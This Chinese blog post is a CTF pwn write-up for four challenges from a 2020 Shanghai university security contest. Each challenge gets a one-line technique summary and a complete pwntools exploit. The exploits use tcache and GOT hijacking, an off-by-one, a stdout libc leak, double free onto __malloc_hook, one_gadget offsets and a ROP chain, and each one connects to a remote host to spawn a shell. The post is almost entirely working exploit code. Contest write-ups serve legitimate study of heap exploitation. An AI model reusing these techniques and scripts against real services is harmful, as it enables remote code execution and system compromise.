美文网首页
上海大学生网络安全竞赛 pwn wp

上海大学生网络安全竞赛 pwn wp

作者: cnitlrt | 来源:发表于2020-11-15 16:51 被阅读0次
    cpu_emulator

    通过越界写劫持tcache数组,在其0x80和0x40的位置填入free的got表和atoi函数的got表地址,申请的时候将free_got劫持为printf泄露libc,而后将atoi函数的got表劫持为system函数,从而获取shell,需要注意的是本题是更新过的2.27libc,因此若是直接劫持会crash
    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    #__Author__ = Cnitlrt
    context.log_level = 'debug'
    
    binary = 'emulator'
    elf = ELF('emulator')
    libc = elf.libc
    context.binary = binary
    
    DEBUG = 0
    if DEBUG:
      p = process(binary)
      # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
    else:
      host = "123.56.52.128"
      port =  18236
      p = remote(host,port)
    if DEBUG == 2:
      host = ""
      port = 0
      user = ""
      passwd = ""
      p = ssh(host,port,user,passwd)
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    rl  = lambda      : p.recv()
    sl  = lambda payload: p.sendline(payload)
    ru  = lambda a     :p.recvuntil(str(a))
    def cmd(idx):
        sla(">> ",str(idx))
    def opp(payload):
        cmd(1)
        sla("size:\n",len(payload))
        sa("instruction:\n",payload)
    def add1(size,payload):
        cmd(1)
        sla("size:\n",str(size))
        sa("instruction:\n",payload)
    def add(idx,offset):
        return u32(p16(offset)+p8(idx)+p8(0x20))
    def sub(idx,offset):
        return u32(p16(offset)+p8(idx)+p8(0x24))
    def AND(idx,offset):
        return u32(p16(offset)+p8(idx)+p8(0x30))
    def OR(idx,offset):
        return u32(p16(offset)+p8(idx)+p8(0x34))
    def XOR(idx,offset):
        return u32(p16(offset)+p8(idx)+p8(0x38))
    def SHIFT(idx,offset):
        return u32(p16(offset)+p8(idx)+p8(0x3c))
    def read(idx,offset):
        return u32(p16(offset)+p8(idx)+p8(0x8c))
    def write(idx,offset):
        return u32(p16(offset)+p8(idx)+p8(0xac))
    """
    (0x3e00000 & a1) >> 21
    (0x1f0000 & a1) >>16
    (0xffff & a1)
    """
    """
    reg[0] = 0xfffe0000
    reg[0] = reg[0]+0xfdf0
    reg[1] = 0x600000
    reg[1] += reg[1]+0x2018
    memory[reg[0]] = reg[1]
    """
    free_got = 0x0000000000602018
    payload = p32(add(0x04,0x10))+p32(add(0x05,0x20))+p32(add(0x06,0x60))
    payload += p32(add(0x09,0x2))
    payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe20))
    payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
    payload += p32(add(0x04,0x58-0x20))
    payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfe00))
    payload += p32(write(0x04,0))+p32(write(0x05,1))+p32(write(0x06,2))
    payload += p32(SHIFT(0x00,0xffff))+p32(add(0x00,0xfdb0))
    payload += p32(write(0x09,2))+p32(write(0x09,6))
    opp(payload)
    #rax = opcode >> 26
    #rdx = rax*4
    #eax = rdx+rax
    #rdx = [0x401404+rdx]
    #rax = 0x401404+[0x401404+4*(opcode >> 26)]
    #0x400ECD
    
    # b *0x400971
    # b *0x400A2D
    cmd(2)
    add1(0x78,p64(elf.plt["printf"])*2)
    add1(0x68,"%9$p")
    cmd(1)
    ru("0x")
    libc_base = int(p.recv(12),16)-231-libc.sym["__libc_start_main"]
    lg("libc_base",libc_base)
    sla("size:\n",str(0x38))
    sa("instruction:\n",p64(libc_base+libc.sym["system"]))
    # add1(0x38,p64(libc_base+libc.sym["system"]))
    cmd("sh")
    
    
    # gdb.attach(p,"""
    #   b *0x400eac
    # """)
    p.interactive()
    
    lgtwo

    off by one 没有show,劫持stdout泄露libc,double free劫持malloc_hook,one_gadget条件不满足,需要用libc_realloc调整栈帧
    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    #__Author__ = Cnitlrt
    # context.log_level = 'debug'
    
    binary = 'pwn2'
    elf = ELF('pwn2')
    libc = elf.libc
    context.binary = binary
    
    DEBUG = 0
    if DEBUG:
      p = process(binary)
      # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
    else:
      host = "123.56.52.128"
      port =  45830
      p = remote(host,port)
    if DEBUG == 2:
      host = ""
      port = 0
      user = ""
      passwd = ""
      p = ssh(host,port,user,passwd)
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    rl  = lambda      : p.recv()
    sl  = lambda payload: p.sendline(payload)
    ru  = lambda a     :p.recvuntil(str(a))
    def cmd(idx):
        sla(">> ",str(idx))
    def add(size,payload):
        cmd(1)
        sla("size?\n",str(size))
        sa("content?\n",payload)
    def free(idx):
        cmd(2)
        sla("index ?\n",str(idx))
    def edit(idx,payload):
        cmd(4)
        sla("index ?\n",str(idx))
        sa("content ?\n",payload)
    add(0xf8,"aaaa")#0
    add(0x68,"aaaa")#1
    add(0xf8,"aaaa")#2
    add(0xf8,"aaaa")#3
    add(0x68,"aaaa")#4
    add(0xf8,"aaaa")#5
    add(0x68,"aaaa")#6
    free(0)
    edit(1,"a"*0x60+p64(0x70+0x100)+p8(0))
    free(2)
    add(0xf8,"aaaa")#0
    add(0x68,"aaaa")#2->1
    add(0xf8,"aaaa")#7
    free(0)
    add(0x68,"aaaa")
    add(0x68,"aaaa")#8
    edit(8,p16(0x25dd))
    free(0)
    free(1)
    edit(2,p8(0x70))
    add(0x68,"aaa")#0
    add(0x68,"aaa")#1
    add(0x68,"aaa")#9
    edit(9,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88))
    libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
    lg("libc_base",libc_base)
    free(4)
    free(0)
    edit(2,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
    add(0x68,"aaaa")
    add(0x68,"aaaa")
    """
    0x45226 execve("/bin/sh", rsp+0x30, environ)
    constraints:
      rax == NULL
    
    0x4527a execve("/bin/sh", rsp+0x30, environ)
    constraints:
      [rsp+0x30] == NULL
    
    0xf0364 execve("/bin/sh", rsp+0x50, environ)
    constraints:
      [rsp+0x50] == NULL
    
    0xf1207 execve("/bin/sh", rsp+0x70, environ)
    constraints:
      [rsp+0x70] == NULL
    """
    edit(4,"a"*(0x13-0x8)+p64(libc_base+0x4527a)+p64(libc_base+libc.sym["__libc_realloc"]+0x8))
    cmd(1)
    p.recv()
    p.sendline(str(0x100))
    # gdb.attach(p)
    p.interactive()
    
    maj0rone

    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # @Author: cnitlrt
    import sys
    import os
    from pwn import *
    # context.lo1
    context.log_level = 'debug'
    
    binary = 'maj'
    elf = ELF('maj')
    libc = elf.libc
    context.binary = binary
    
    DEBUG = 0
    if DEBUG:
      p = process(binary)
      # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
    else:
      host = "123.56.52.128"
      port =  18523
      p = remote(host,port)
    if DEBUG == 2:
      host = ""
      port = 0
      user = ""
      passwd = ""
      p = ssh(host,port,user,passwd)
    o_g = [0x45226,0x4527a,0xf0364,0xf1207]
    magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    rl  = lambda      : p.recv()
    sl  = lambda payload: p.sendline(payload)
    ru  = lambda a     :p.recvuntil(str(a))
    def cmd(idx):
        sla(">> ",str(idx))
    def add(size,payload):
        cmd(1)
        sla('please answer the question\n',str(80))
        sla("______?\n",str(size))
        sa("yes_or_no?\n",payload)
    def free(idx):
        cmd(2)
        sla("index ?\n",str(idx))
    def show(idx):
        cmd(3)
        sla("index ?\n",str(idx))
    def edit(idx,payload):
        cmd(4)
        sla("index ?\n",str(idx))
        sa("__new_content ?\n",payload)
    add(0x28,"0")
    add(0x68,"0")
    add(0x68,'0')
    add(0x68,'0')
    add(0x68,'0')
    edit(0,p64(0)+p64(0x71))
    payload = p64(0)+p64(0x21)
    edit(1,payload*6)
    free(2)
    free(1)
    edit(1,'\x10')
    add(0x68,"1")
    add(0x68,"1")#6
    payload = p64(0)*3+p64(0x70+0x71)
    edit(6,payload)
    free(1)
    add(0x68,"a")#7
    add(0x68,"a")#8->2
    edit(6,payload)
    free(1)
    free(2)
    add(0x38,"a")#9
    add(0x28,"a")#10
    edit(8,p16(0x25dd))
    add(0x68,"a")
    add(0x68,"12")
    edit(12,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0))
    libc_base = l64()-0x3c5600
    lg("libc_base",libc_base)
    free(3)
    edit(3,p64(libc_base+libc.sym["__malloc_hook"]-0x23))
    add(0x68,"a")
    add(0x68,"14")
    edit(14,"a"*0x13+p64(o_g[3]+libc_base))
    cmd(1)
    sla('please answer the question\n',str(80))
    sla("______?\n",str(80))
    # gdb.attach(p)
    p.interactive()
    
    EASY_ABNORMAL

    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    #__Author__ = Cnitlrt
    #context.log_level = 'debug'
    
    binary = 'pwn111'
    elf = ELF('pwn111')
    libc = elf.libc
    context.binary = binary
    
    DEBUG = 0
    if DEBUG:
      p = process(binary)
      # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
    else:
      host = "123.56.52.128"
      port =  10012
      p = remote(host,port)
    if DEBUG == 2:
      host = ""
      port = 0
      user = ""
      passwd = ""
      p = ssh(host,port,user,passwd)
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    rl  = lambda      : p.recv()
    sl  = lambda payload: p.sendline(payload)
    ru  = lambda a     :p.recvuntil(str(a))
    def cmd(idx):
        sla("E :",str(idx))
    def add(payload):
        cmd(2)
        sla("cnt:\n",payload)
    def free(idx):
        cmd(3)
        sla("idx:",str(idx))
    def show(idx):
        cmd(4)
    def gift(payload):
        cmd(23333)
        sa("INPUT:",payload)
    sla("NAME: ","%11$p")
    cmd(1)
    ru("0x")
    libc_base = int(p.recv(12),16)-240-libc.sym["__libc_start_main"]
    lg("libc_base",libc_base)
    pop_rdi = libc_base + 0x21112
    sys_addr = libc_base + libc.sym['system']
    sh_addr = libc_base + libc.search("/bin/sh").next()
    ret = libc_base + 0x0937
    payload = p64(ret)*6+p64(pop_rdi)+p64(sh_addr)+p64(sys_addr)
    add(payload)
    add(payload)
    free(0)
    free(1)
    show(1)
    ru("2:")
    heap_base = u64(ru("\n")[:-1].ljust(8,"\x00"))
    lg("heap_base",heap_base)
    
    # gdb.attach(p)
    gift("a"*0x20+p64(heap_base+0x20))
    p.interactive()
    

    相关文章

      网友评论

          本文标题:上海大学生网络安全竞赛 pwn wp

          本文链接:https://www.haomeiwen.com/subject/arawbktx.html